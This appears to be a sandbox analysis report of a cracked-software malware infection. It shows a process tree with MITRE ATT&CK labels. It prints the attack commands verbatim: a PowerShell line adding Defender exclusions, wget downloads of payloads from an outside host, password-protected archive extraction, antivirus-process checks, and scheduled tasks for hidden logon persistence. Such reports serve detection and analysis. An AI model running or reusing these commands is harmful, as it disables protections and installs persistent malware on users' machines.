        command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1880,6914889636912935102,1134626418975215849,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5740 /prefetch:1
        PID: 4072
    [2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1880,6914889636912935102,1134626418975215849,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3488 /prefetch:1
        PID: 4064
    [2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1880,6914889636912935102,1134626418975215849,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5864 /prefetch:1
        PID: 4768
    [2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1880,6914889636912935102,1134626418975215849,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5944 /prefetch:8
        - NTFS ADS
        - Suspicious behavior: EnumeratesProcesses
        PID: 4552
[1] C:\Windows\System32\CompPkgSrv.exe
    command: C:\Windows\System32\CompPkgSrv.exe -Embedding
    PID: 2032

[1] C:\Windows\System32\CompPkgSrv.exe
    command: C:\Windows\System32\CompPkgSrv.exe -Embedding
    PID: 3872

[1] C:\Windows\System32\rundll32.exe
    command: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
    PID: 920
[1] C:\Program Files\7-Zip\7zFM.exe
    command: "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Downloads\bandicam-crack.zip"
    - Suspicious behavior: GetForegroundWindowSpam
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of FindShellTrayWindow
    PID: 3352
[1] C:\Users\Admin\Desktop\a\Launcher.exe
    command: "C:\Users\Admin\Desktop\a\Launcher.exe"
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Modifies system certificate store
    PID: 2036
    [2] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "$AdminRightsRequired = $true; function Get-Win { while ($true) { if ($AdminRightsRequired) { try { Start-Process -FilePath 'C:\Users\Admin\Desktop\a\Launcher.exe' -Verb RunAs -Wait; break } catch { Write-Host 'Error 0xc0000906' } } else { break } } }; Get-Win"
        - Command and Scripting Interpreter: PowerShell
        - System Location Discovery: System Language Discovery
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        PID: 3336
        [3] C:\Users\Admin\Desktop\a\Launcher.exe
            command: "C:\Users\Admin\Desktop\a\Launcher.exe"
            - Executes dropped EXE
            - System Location Discovery: System Language Discovery
            PID: 620
            [4] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath $env:USERPROFILE, $env:ProgramData, $env:SystemDrive\\"
                - Command and Scripting Interpreter: PowerShell
                - System Location Discovery: System Language Discovery
                - Suspicious behavior: EnumeratesProcesses
                - Suspicious use of AdjustPrivilegeToken
                PID: 1892
            [4] C:\Users\Admin\AppData\Local\Temp\wget.exe
                command: "C:\Users\Admin\AppData\Local\Temp\wget.exe" --no-check-certificate --no-hsts https://22800.wabemquesturge.com/3 -O C:\Users\Admin\AppData\Local\Temp\0196604
                - Executes dropped EXE
                - Suspicious use of FindShellTrayWindow
                PID: 2176
            [4] C:\Users\Admin\AppData\Local\Temp\winrar.exe
                command: "C:\Users\Admin\AppData\Local\Temp\winrar.exe" x -y -pjryj2023 C:\Users\Admin\AppData\Local\Temp\01*.* C:\Users\Admin\AppData\Local\Temp
                - Executes dropped EXE
                PID: 4784
            [4] C:\Users\Admin\AppData\Local\Temp\wget.exe
                command: "C:\Users\Admin\AppData\Local\Temp\wget.exe" --no-check-certificate --no-hsts https://50291.wabemquesturge.com/4 -O C:\Users\Admin\AppData\Local\Temp\028185
                - Executes dropped EXE
                PID: 4820
            [4] C:\Users\Admin\AppData\Local\Temp\winrar.exe
                command: "C:\Users\Admin\AppData\Local\Temp\winrar.exe" x -y -pjryj2023 C:\Users\Admin\AppData\Local\Temp\02*.* C:\Users\Admin\AppData\Local\Temp
                - Executes dropped EXE
                PID: 4420
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe"1⤵
- Checks SCSI registry key(s)
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2760
-
C:\Users\Admin\AppData\Local\Temp\11088582C:\Users\Admin\AppData\Local\Temp\110885821⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1940
-
C:\Users\Admin\AppData\Local\Temp\22040691C:\Users\Admin\AppData\Local\Temp\220406911⤵
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:1372 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy Monitored Monitored.cmd && Monitored.cmd2⤵
- System Location Discovery: System Language Discovery
PID:3356 -
C:\Windows\SysWOW64\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1940
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "wrsa opssvc"3⤵
- System Location Discovery: System Language Discovery
PID:2336
-
-
C:\Windows\SysWOW64\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3820
-
-
C:\Windows\SysWOW64\findstr.exefindstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"3⤵
- System Location Discovery: System Language Discovery
PID:4488
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 7515053⤵
- System Location Discovery: System Language Discovery
PID:2392
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V "EntriesLiftTonerViiCoxDriverGraphsRepublic" Town3⤵
- System Location Discovery: System Language Discovery
PID:4172
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b ..\Offline + ..\Forgot + ..\Refused + ..\Inside + ..\Extreme + ..\Mason + ..\Session + ..\Ambient k3⤵
- System Location Discovery: System Language Discovery
PID:2296
-
-
C:\Users\Admin\AppData\Local\Temp\751505\Ide.comIde.com k3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SendNotifyMessage
PID:4164 -
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /create /tn "EchoSphere" /tr "wscript //B 'C:\Users\Admin\AppData\Local\EchoCraft Dynamics\EchoSphere.js'" /sc onlogon /F /RL HIGHEST4⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:804
-
-
C:\Users\Admin\AppData\Local\Temp\10000020101\fd3cd35a12.exe"C:\Users\Admin\AppData\Local\Temp\10000020101\fd3cd35a12.exe"4⤵
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:4732 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy Arkansas Arkansas.cmd && Arkansas.cmd5⤵
- System Location Discovery: System Language Discovery
PID:4888 -
C:\Windows\SysWOW64\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4624
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "wrsa opssvc"6⤵
- System Location Discovery: System Language Discovery
PID:2808
-
-
C:\Windows\SysWOW64\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3304
-
-
C:\Windows\SysWOW64\findstr.exefindstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"6⤵
- System Location Discovery: System Language Discovery
PID:240
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 2607666⤵
- System Location Discovery: System Language Discovery
PID:1872
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V "SympathyLibertySightDefectsEndsParticularDrawingsPhysiology" Papua6⤵
- System Location Discovery: System Language Discovery
PID:3460
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b ..\Christ + ..\Abraham + ..\Clicking + ..\Ibm + ..\Also + ..\Cambodia + ..\Belgium + ..\Xml + ..\Peterson + ..\Spot + ..\Carry I6⤵
- System Location Discovery: System Language Discovery
PID:1928
-
-
C:\Users\Admin\AppData\Local\Temp\260766\Officials.comOfficials.com I6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2792 -
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /create /tn "CryptoMindTechPro360X" /tr "wscript //B 'C:\Users\Admin\AppData\Local\CryptoTechMind360 Elite Innovations Co\CryptoMindTechPro360X.js'" /sc onlogon /F /RL HIGHEST7⤵
- Scheduled Task/Job: Scheduled Task
PID:236
-
-
C:\Users\Admin\AppData\Local\Temp\260766\Officials.comC:\Users\Admin\AppData\Local\Temp\260766\Officials.com7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:492 -
C:\Windows\system32\dwm.exedwm.exe8⤵
- Suspicious use of AdjustPrivilegeToken
PID:3356
-
-
-
-
C:\Windows\SysWOW64\choice.exechoice /d y /t 156⤵
- System Location Discovery: System Language Discovery
PID:4248
-
-
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Local\Temp\10000030111\f90a5e8246.dll, Main4⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:3992 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3992 -s 4525⤵
- Program crash
PID:4816
-
-
-
-
C:\Windows\SysWOW64\choice.exechoice /d y /t 153⤵
- System Location Discovery: System Language Discovery
PID:856
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 3992 -ip 39921⤵PID:468
MITRE ATT&CK Enterprise v15
Execution
- Command and Scripting Interpreter (1)
  - PowerShell (1)
- Scheduled Task/Job (1)
  - Scheduled Task (1)
Defense Evasion
- Modify Registry (1)
- Subvert Trust Controls (1)
  - Install Root Certificate (1)
Downloads